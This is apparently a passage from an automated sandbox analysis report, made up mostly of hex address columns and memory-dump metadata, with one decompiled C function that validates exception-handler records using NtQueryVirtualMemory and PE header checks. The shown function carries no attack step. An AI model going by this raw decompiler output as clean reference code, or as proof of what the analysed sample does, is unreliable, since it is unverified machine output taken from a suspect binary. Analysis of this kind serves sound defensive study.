                                                                                                                                                                                                    0x04f69efe
                                                                                                                                                                                                    0x04f69f01
                                                                                                                                                                                                    0x04f69f15
                                                                                                                                                                                                    0x04f69f18
                                                                                                                                                                                                    0x04f69f2c
                                                                                                                                                                                                    0x04f69f2f
                                                                                                                                                                                                    0x04f69f43
                                                                                                                                                                                                    0x04f69f46
                                                                                                                                                                                                    0x04f69f5a
                                                                                                                                                                                                    0x04f69f5d
                                                                                                                                                                                                    0x04f69f71
                                                                                                                                                                                                    0x04f69f74
                                                                                                                                                                                                    0x04f69f88
                                                                                                                                                                                                    0x04f69f8d
                                                                                                                                                                                                    0x04f69f9f
                                                                                                                                                                                                    0x04f69fa2
                                                                                                                                                                                                    0x04f69fb6
                                                                                                                                                                                                    0x04f69fb9
                                                                                                                                                                                                    0x04f69fcd
                                                                                                                                                                                                    0x04f69fd0
                                                                                                                                                                                                    0x04f69fe6
                                                                                                                                                                                                    0x04f69fe9
                                                                                                                                                                                                    0x04f69ffd
                                                                                                                                                                                                    0x04f6a000
                                                                                                                                                                                                    0x04f6a012
                                                                                                                                                                                                    0x04f6a015
                                                                                                                                                                                                    0x04f6a029
                                                                                                                                                                                                    0x04f6a02c
                                                                                                                                                                                                    0x04f6a040
                                                                                                                                                                                                    0x04f6a043
                                                                                                                                                                                                    0x04f6a057
                                                                                                                                                                                                    0x04f6a060
                                                                                                                                                                                                    0x04f6a063
                                                                                                                                                                                                    0x04f6a06c
                                                                                                                                                                                                    0x04f6a075
                                                                                                                                                                                                    0x04f6a07d
                                                                                                                                                                                                    0x04f6a085
                                                                                                                                                                                                    0x04f6a08f
                                                                                                                                                                                                    0x04f6a0a4

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                    • Opcode ID: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
                                                                                                                                                                                                    • Instruction ID: c93d7b01aea172bd273d60c714613b1bae64b1e17af188021fa7f2842ad099de
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50e1001d6c2c4e3c59974a9fb3ff68b46dee939a17525b2316b9db9958cb51ed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6922847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F6B2C1(long _a4) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                    							_t81 =  *0x4f6d2d8; // 0x0
                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                    										 *0x4f6d320 = 1;
                                                                                                                                                                                                    										__eflags =  *0x4f6d320;
                                                                                                                                                                                                    										if( *0x4f6d320 != 0) {
                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t84 =  *0x4f6d2d8; // 0x0
                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												 *0x4f6d320 = 0;
                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                    													 *0x4f6d2d8 = _t86;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												do {
                                                                                                                                                                                                    													_t68 = 0x4f6d2e0 + _t94 * 4;
                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t69 = 0x4f6d2dc + _t84 * 4;
                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    								if( *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x4f6d320 = 1;
                                                                                                                                                                                                    							__eflags =  *0x4f6d320;
                                                                                                                                                                                                    							if( *0x4f6d320 != 0) {
                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    							if( *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                    									 *0x4f6d320 = 0;
                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                    									_t90 = 0x4f6d2e0 + _t100 * 4;
                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                    							_t58 = _t25;
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                    									 *0x4f6d2d8 = _t81;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                    								_t58 = _t28;
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    								if( *((intOrPtr*)(0x4f6d2e0 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




































                                                                                                                                                                                                    0x04f6b2cb
                                                                                                                                                                                                    0x04f6b2ce
                                                                                                                                                                                                    0x04f6b2d4
                                                                                                                                                                                                    0x04f6b2f2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b2f2
                                                                                                                                                                                                    0x04f6b2dc
                                                                                                                                                                                                    0x04f6b2e5
                                                                                                                                                                                                    0x04f6b2eb
                                                                                                                                                                                                    0x04f6b2fa
                                                                                                                                                                                                    0x04f6b2fd
                                                                                                                                                                                                    0x04f6b300
                                                                                                                                                                                                    0x04f6b30a
                                                                                                                                                                                                    0x04f6b30a
                                                                                                                                                                                                    0x04f6b30c
                                                                                                                                                                                                    0x04f6b30f
                                                                                                                                                                                                    0x04f6b311
                                                                                                                                                                                                    0x04f6b311
                                                                                                                                                                                                    0x04f6b313
                                                                                                                                                                                                    0x04f6b316
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b318
                                                                                                                                                                                                    0x04f6b31a
                                                                                                                                                                                                    0x04f6b380
                                                                                                                                                                                                    0x04f6b380
                                                                                                                                                                                                    0x04f6b4de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b4de
                                                                                                                                                                                                    0x04f6b31c
                                                                                                                                                                                                    0x04f6b31c
                                                                                                                                                                                                    0x04f6b320
                                                                                                                                                                                                    0x04f6b322
                                                                                                                                                                                                    0x04f6b322
                                                                                                                                                                                                    0x04f6b322
                                                                                                                                                                                                    0x04f6b322
                                                                                                                                                                                                    0x04f6b325
                                                                                                                                                                                                    0x04f6b326
                                                                                                                                                                                                    0x04f6b329
                                                                                                                                                                                                    0x04f6b329
                                                                                                                                                                                                    0x04f6b32d
                                                                                                                                                                                                    0x04f6b331
                                                                                                                                                                                                    0x04f6b33f
                                                                                                                                                                                                    0x04f6b33f
                                                                                                                                                                                                    0x04f6b347
                                                                                                                                                                                                    0x04f6b34d
                                                                                                                                                                                                    0x04f6b34f
                                                                                                                                                                                                    0x04f6b351
                                                                                                                                                                                                    0x04f6b361
                                                                                                                                                                                                    0x04f6b36e
                                                                                                                                                                                                    0x04f6b372
                                                                                                                                                                                                    0x04f6b377
                                                                                                                                                                                                    0x04f6b379
                                                                                                                                                                                                    0x04f6b3f7
                                                                                                                                                                                                    0x04f6b3f7
                                                                                                                                                                                                    0x04f6b37b
                                                                                                                                                                                                    0x04f6b37b
                                                                                                                                                                                                    0x04f6b37b
                                                                                                                                                                                                    0x04f6b3f9
                                                                                                                                                                                                    0x04f6b3fb
                                                                                                                                                                                                    0x04f6b4dc
                                                                                                                                                                                                    0x04f6b4dc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b401
                                                                                                                                                                                                    0x04f6b401
                                                                                                                                                                                                    0x04f6b408
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b40e
                                                                                                                                                                                                    0x04f6b412
                                                                                                                                                                                                    0x04f6b46e
                                                                                                                                                                                                    0x04f6b470
                                                                                                                                                                                                    0x04f6b478
                                                                                                                                                                                                    0x04f6b47a
                                                                                                                                                                                                    0x04f6b47c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b47e
                                                                                                                                                                                                    0x04f6b484
                                                                                                                                                                                                    0x04f6b486
                                                                                                                                                                                                    0x04f6b488
                                                                                                                                                                                                    0x04f6b49d
                                                                                                                                                                                                    0x04f6b49d
                                                                                                                                                                                                    0x04f6b49f
                                                                                                                                                                                                    0x04f6b4ce
                                                                                                                                                                                                    0x04f6b4d5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b4d5
                                                                                                                                                                                                    0x04f6b4a3
                                                                                                                                                                                                    0x04f6b4a4
                                                                                                                                                                                                    0x04f6b4a6
                                                                                                                                                                                                    0x04f6b4a8
                                                                                                                                                                                                    0x04f6b4a8
                                                                                                                                                                                                    0x04f6b4aa
                                                                                                                                                                                                    0x04f6b4ac
                                                                                                                                                                                                    0x04f6b4ae
                                                                                                                                                                                                    0x04f6b4c2
                                                                                                                                                                                                    0x04f6b4c2
                                                                                                                                                                                                    0x04f6b4c5
                                                                                                                                                                                                    0x04f6b4c7
                                                                                                                                                                                                    0x04f6b4c7
                                                                                                                                                                                                    0x04f6b4c8
                                                                                                                                                                                                    0x04f6b4c8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b4b0
                                                                                                                                                                                                    0x04f6b4b0
                                                                                                                                                                                                    0x04f6b4b0
                                                                                                                                                                                                    0x04f6b4b9
                                                                                                                                                                                                    0x04f6b4ba
                                                                                                                                                                                                    0x04f6b4bc
                                                                                                                                                                                                    0x04f6b4be
                                                                                                                                                                                                    0x04f6b4be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b4b0
                                                                                                                                                                                                    0x04f6b4ae
                                                                                                                                                                                                    0x04f6b48a
                                                                                                                                                                                                    0x04f6b491
                                                                                                                                                                                                    0x04f6b491
                                                                                                                                                                                                    0x04f6b493
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b495
                                                                                                                                                                                                    0x04f6b496
                                                                                                                                                                                                    0x04f6b499
                                                                                                                                                                                                    0x04f6b49b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b49b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b491
                                                                                                                                                                                                    0x04f6b414
                                                                                                                                                                                                    0x04f6b417
                                                                                                                                                                                                    0x04f6b41c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b425
                                                                                                                                                                                                    0x04f6b427
                                                                                                                                                                                                    0x04f6b42d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b433
                                                                                                                                                                                                    0x04f6b439
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b43f
                                                                                                                                                                                                    0x04f6b441
                                                                                                                                                                                                    0x04f6b44a
                                                                                                                                                                                                    0x04f6b44e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b454
                                                                                                                                                                                                    0x04f6b457
                                                                                                                                                                                                    0x04f6b459
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b460
                                                                                                                                                                                                    0x04f6b462
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b464
                                                                                                                                                                                                    0x04f6b468
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b468
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b353
                                                                                                                                                                                                    0x04f6b353
                                                                                                                                                                                                    0x04f6b353
                                                                                                                                                                                                    0x04f6b35a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b35c
                                                                                                                                                                                                    0x04f6b35d
                                                                                                                                                                                                    0x04f6b35f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b35f
                                                                                                                                                                                                    0x04f6b387
                                                                                                                                                                                                    0x04f6b389
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b399
                                                                                                                                                                                                    0x04f6b39b
                                                                                                                                                                                                    0x04f6b39d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3a3
                                                                                                                                                                                                    0x04f6b3aa
                                                                                                                                                                                                    0x04f6b3d6
                                                                                                                                                                                                    0x04f6b3d6
                                                                                                                                                                                                    0x04f6b3d8
                                                                                                                                                                                                    0x04f6b3da
                                                                                                                                                                                                    0x04f6b3ee
                                                                                                                                                                                                    0x04f6b3f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3dc
                                                                                                                                                                                                    0x04f6b3dc
                                                                                                                                                                                                    0x04f6b3dc
                                                                                                                                                                                                    0x04f6b3e5
                                                                                                                                                                                                    0x04f6b3e6
                                                                                                                                                                                                    0x04f6b3e8
                                                                                                                                                                                                    0x04f6b3ea
                                                                                                                                                                                                    0x04f6b3ea
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3dc
                                                                                                                                                                                                    0x04f6b3ac
                                                                                                                                                                                                    0x04f6b3ac
                                                                                                                                                                                                    0x04f6b3af
                                                                                                                                                                                                    0x04f6b3b1
                                                                                                                                                                                                    0x04f6b3c3
                                                                                                                                                                                                    0x04f6b3c3
                                                                                                                                                                                                    0x04f6b3c6
                                                                                                                                                                                                    0x04f6b3c8
                                                                                                                                                                                                    0x04f6b3c8
                                                                                                                                                                                                    0x04f6b3c9
                                                                                                                                                                                                    0x04f6b3c9
                                                                                                                                                                                                    0x04f6b3cf
                                                                                                                                                                                                    0x04f6b3cf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3b3
                                                                                                                                                                                                    0x04f6b3b3
                                                                                                                                                                                                    0x04f6b3b3
                                                                                                                                                                                                    0x04f6b3ba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3bc
                                                                                                                                                                                                    0x04f6b3bc
                                                                                                                                                                                                    0x04f6b3bd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3bd
                                                                                                                                                                                                    0x04f6b3bf
                                                                                                                                                                                                    0x04f6b3c1
                                                                                                                                                                                                    0x04f6b3d4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3d4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b3c1
                                                                                                                                                                                                    0x04f6b333
                                                                                                                                                                                                    0x04f6b336
                                                                                                                                                                                                    0x04f6b339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b33b
                                                                                                                                                                                                    0x04f6b33d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6b33d
                                                                                                                                                                                                    0x04f6b302
                                                                                                                                                                                                    0x04f6b304
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 04F6B372
                                                                                                                                                                                                    Memory Dump Source
